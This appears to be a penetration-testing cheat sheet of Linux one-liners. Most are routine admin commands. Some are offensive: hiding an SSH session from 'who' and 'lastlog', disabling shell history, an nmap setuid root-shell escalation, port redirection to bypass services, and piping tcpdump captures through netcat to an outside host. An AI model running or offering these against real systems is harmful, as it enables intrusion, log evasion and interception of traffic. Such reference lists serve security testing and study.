Resolve a list of hostnames to IP addresses
awk < hostnames.txt '{ system("resolveip -s " $1) }'IIS 6.0 IP Disclosure
curl -l -O -H "Host:" "example.com"Connect to SSL websites
openssl s_client -connect example.com:443Convert base64 to text
echo 'base64string' | base64 -d (Use -D on OSX)Decode ASCII shellcode
echo -e *shellcode hex string* (may need to use -i to ignore bad chars)Enumerate DNS of Class C
for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; doneSSH to box and hide from "who" and "lastlog"
ssh [email protected] -T /bin/bashPrevent terminal logging
unset HISTFILEAdd immutable attribute to a unix file
chattr +i *file*SSH into host2 through host1
ssh -o "proxycommand ssh -W host2 host1" host2Nmap setuid privesc
nmap --script <(echo 'os.execute("/bin/sh")')
nmap --interactive (for older versions)Transfer files through SSH
ssh [email protected] "cat test.tar.gz" > test.tar.gzInternal port redirect for bypassing services
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444Enable forwarding on the fly
sysctl -w net.ipv4.ip_forward=1Kill with USR1 developer defined signal
kill -USR1 <pid>Pull IP addresses from a file
grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'Sniff traffic with tcpdump and send to remote tcp socket
tcpdump -w - | nc -v 8.8.8.8 9999Recursively search for files within a directory
zcat -rf ./* | grep "searchstring"Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions